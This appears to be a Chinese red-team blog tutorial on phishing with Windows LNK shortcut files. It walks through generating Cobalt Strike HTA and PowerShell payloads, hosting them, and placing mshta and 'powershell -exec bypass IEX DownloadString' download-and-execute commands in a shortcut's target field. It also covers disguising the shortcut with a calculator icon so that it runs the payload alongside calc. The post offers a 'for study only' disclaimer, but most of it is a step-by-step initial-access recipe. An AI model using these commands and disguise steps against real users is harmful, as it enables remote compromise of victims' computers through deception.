快捷执行方式_红队攻防之LNK快捷方式钓鱼

73048b3593d63ce75475f92511d567f3.gif点击上方“蓝字”,发现更多精彩。

0x00 LNK快捷方式介绍

lnk文件是用于指向其他文件的一种文件。这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用者快速的调用。 “.lnk”是WINDOWS系统默认bai的快捷方式的扩展名,如果“文件夹选项”下设置为“隐藏已知文件类型的扩展名”,正常情况下“.lnk”是不显示的。

0x01 准备工具及流程

准备工具:Cobalt Strike 钓鱼流程:制作快捷方式 -> 构建上线payload -> 二次伪装 -> 点击上线

0x02 钓鱼快捷方式制作

30f3eb47e3beea3dc7eb1b9983b9208c.png 这里可以看到,我创建了一个phpstudy_pro的快捷方式,当然如果发送到对方电脑,我们最好是选择Windows共有的,比如cmd。(我这里因为个人原因所以去除了快捷方式小箭头图标) 73a746e4d615c4346045135cc718a0b6.png 接下来创建个计算器的快捷方式 3ebf3d14cfb2a49cdcdfde2a83afebc5.png 7167877d34e926a46a88775de336bfd1.png 创建成功 63358dd3d21cc2a0d0733d88e768a6d1.png 双击打开看看 df8cde371ea4634cbacb760f43f1c122.png 打开正常,我们移动到win7靶机上打开 1fbdd266e424f0f70c1dfb8e0197cb5b.png 75f040c4fd64c58b2366c077d623c79f.png 可以看到快捷方式依旧不受影响。 接下来我们右键快捷方式属性 3ba73b8a06e539d6a2de61d7c17246c2.png 在目标位置可以填写我们的命令也是后面payload填写位置。

0x03 Cobalt Strike钓鱼模块 + 快捷方式上线

Attacks -> Packages -> Html Application
  1. 生成一个html application
Attacks -> Packages -> Html Application
选择 HTML Application e808c8ecaa951fbd4165afb2e4fe0a3e.png 有三种method
  • executable(生成可执行攻击脚本)
  • powershell (生成一个powershell的脚本)
  • VBA (生成一个vba的脚本,使用mshta命令执行)
8e07e417f5a89d80701bf8c02cba797d.png 这里很多人使用说executable跟vba不大好使,这里推荐使用powershell,点击Generate 8bcc86a66bd75f9a3a9a1c1587338611.png 生成了一个文件,保存到桌面 725e00a83692631997f8f1c05c8ae67d.png
  1. 上传到host file中
9c2611c925b61a6417d9ecdc14e70b2e.png 上传我们生成的.hta文件,点击Launch,会生成一个URL b58ba5bcc7518aaa71f498ceee822f19.png
http://192.168.126.130:80/download/file.ext
73efd3068e7750c884ac0d7ea924d2f3.png
  1. 然后用mshta执行hta文件。
C:\Windows\System32\mshta.exe http://192.168.126.130:80/download/file.ext
  1. 接下来构造 目标位置命令
2a502a2646fc18b1a1d460ae63d5c50b.png
  1. 点击应用确定后,可以看到图标变了,等后面二次伪装。
d83ec47bcf8fac30da8ca13521e0a523.png
  1. 双击上线
e677c4652e72d4101b78054ce0b5ba54.png 此处上线方式很多种,大家可以根据自己测试需求更改上线方式。

0x04 Power Shell + 快捷方式上线

  1. Cobalt Strike生成powershell payload 保存桌面
Attacks -> Packages -> Payload Generator
d9890ff168554d7da5fa63d99241d01e.png
  1. 上传到host file
fbcc07fa094905bd9ba163dc42a8aad7.png 0a896b559ecbc4e314afdf3635b73dc9.png
  1. 构造成目标位置的命令
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -c IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.126.130:80/download/a')
缺点 会出现一个黑窗口,好的地方就是关闭了黑窗口不影响上线。 b84268a48af3f914698a5ef0dbd86b87.png

0x05 二次伪装

1.更改图标 8eb4a6e27762a149cd59d99405c0df4d.png 使用计算器图标选择calc.exe,点击确定 1335838fb07f74f0dd5fe4be48b2fef3.png 可以看见更改了,再点击应用,确定 8b602fca42124821e3cd91ef93e860d5.png 这里可以看见已经更改成计算器图标了 03101d7e870a742805f96524511b810d.png 2.powershell远程加载执行 同时运行payload及计算器(这个在原先payload上面再加个exe就可以了,但是要注意隐藏运行消除黑色窗口) 11f240235664b7e01372826a01a9f777.png

0x05 总结

注意:此处没做免杀。 缺点:有快捷方式的小箭头,powershell -w隐藏窗口远程加载免杀不好做。 内容仅供学习和参考我知道你 在看哦 73048b3593d63ce75475f92511d567f3.gif
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值